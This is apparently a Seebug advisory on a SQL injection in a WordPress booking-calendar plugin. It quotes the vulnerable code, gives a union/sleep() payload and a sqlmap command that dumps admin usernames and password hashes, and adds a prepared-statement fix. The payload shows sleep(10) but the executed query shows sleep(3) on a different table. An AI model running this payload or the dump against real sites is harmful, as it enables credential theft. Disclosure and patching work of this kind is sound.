WordPress Booking Calendar Contact Form Plugin 1.0.2 /dex_bccf.php SQL Injection Vulnerability

2015-05-27T00:00:00
ID SSV:89217
Type seebug
Reporter Root
Modified 2015-05-27T00:00:00

Description

<ul><li>/dex_bccf.php</li></ul>
<pre class="">function dex_bccf_caculate_price($startday, $enddate, $calendar, $default_price) {
...
// $calendar is not sanitized in sql query: it is concatenated straight into the WHERE clause
$codes = $wpdb->get_results( 'SELECT * FROM '.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE cal_id='.$calendar);
$mode = (dex_bccf_get_option('calendar_mode',DEX_BCCF_DEFAULT_CALENDAR_MODE) == 'false');
// Walk the booking one day at a time; the loop body (and the season lookup below)
// only runs while the end date is after (or, in $mode, at or after) the current day
while (
       (($enddate>$startday) && !$mode) ||
       (($enddate>=$startday) && $mode)
       )
{
    $daily_price = $default_price;
    $sprice = array();
    foreach ($codes as $value)
    {
       $sfrom = strtotime($value->date_from);
       $sto = strtotime($value->date_to);
       // Rows returned by the injected query are consumed here
       if ($startday >= $sfrom && $startday <= $sto)
       {
           $sprice = explode (';', $value->price);
           $daily_price = $sprice[0];
       }
    }
    $season_prices[] = $sprice;
    $price += $daily_price;
    $startday = strtotime (date("Y-m-d", $startday)." +1 day");
//606024;
    $days++;
}
...
}</pre>
<p>$calendar is passed into the SQL statement without any filtering, which results in injection. For the injection condition to be reached, the following must hold:</p>
<pre class="">$enddate>$startday</pre>
<p>and</p>
<pre class="">$startday >= $sfrom && $startday <= $sto</pre>
<p>Construct the query string:</p>
<pre class="">action=dex_bccf_check_posted_data&dex_bccf=getcost&from=2014-1-1&to=2014-1-2</pre>
<p>POST body:</p>
<pre class="">dex_item=1 union select 0x32323B2332,1,sleep(10),3,0x323031342D312D33</pre>
<p>The SQL statement executed is:</p>
<pre class="">SELECT * FROM wp_bccf_reservation_calendars WHERE id=1 union select 0x32323B2332,1,sleep(3),3,0x323031342D312D33</pre>
<p>This proves the vulnerability exists.</p>
<p>Use sqlmap to obtain the administrator's username and password. Command used:</p>
<pre class="">python sqlmap.py -u "http://10.211.55.3/wordpress/?action=dex_bccf_check_posted_data&dex_bccf=getcost&from=2014-1-1&to=2014-1-2" --data="dex_item=1" -p dex_item --dbms=mysql -D wordpress -T wp_users -C user_login,user_pass --dump</pre>
<p><img alt="C41F761A-C60C-4806-9951-6B640FFF9961.png" src="https://images.seebug.org/@/uploads/1434437047822-C41F761A-C60C-4806-9951-6B640FFF9961.png" data-image-size="811,427"></p>
<p>The administrator's username and password are obtained:</p>
<p><img alt="2F36813B-D31C-48F8-B5FA-D62DFCC9DFE2.png" src="https://images.seebug.org/@/uploads/1434437067124-2F36813B-D31C-48F8-B5FA-D62DFCC9DFE2.png" data-image-size="838,368"></p>
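<p>For comparison, a hardened form of the same season-price lookup, written here as an added example and not taken from the plugin: the calendar id is validated as a positive integer and bound through $wpdb->prepare() instead of being concatenated. $wpdb and DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX are the plugin's and WordPress's own names; the function name dex_bccf_season_prices_for() is assumed.</p>

```php
<?php
// Added example (not the plugin's code): same query as in dex_bccf_caculate_price(),
// but with the user-supplied calendar id validated and bound as an integer.
// Assumes WordPress is loaded ($wpdb) and the plugin's table-name constant is defined.

/**
 * Return the season-price rows for one calendar.
 *
 * @param mixed $calendar Raw request value (the plugin reads it from dex_item).
 * @return array<object>  Matching rows, or an empty array when the id is invalid.
 */
function dex_bccf_season_prices_for( $calendar ) {
    global $wpdb;

    // Only a plain positive decimal integer may reach the query. The string
    // "1 union select ..." from the advisory fails this check; "1" passes.
    if ( ! is_scalar( $calendar ) || ! preg_match( '/^[1-9][0-9]*$/', (string) $calendar ) ) {
        return array();
    }
    $cal_id = (int) $calendar;

    // Table name is a constant from the plugin, not user input.
    $table = $wpdb->prefix . DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX;

    // %d makes $wpdb->prepare() interpolate the value as an integer, so no
    // attacker-controlled text can alter the statement.
    $sql = $wpdb->prepare( "SELECT * FROM {$table} WHERE cal_id = %d", $cal_id );

    $rows = $wpdb->get_results( $sql );
    return is_array( $rows ) ? $rows : array();
}
```

<p>With this in place, the $codes loop in dex_bccf_caculate_price() receives rows for the requested calendar only, and the time-based and union payloads shown above are rejected before any SQL is built.</p>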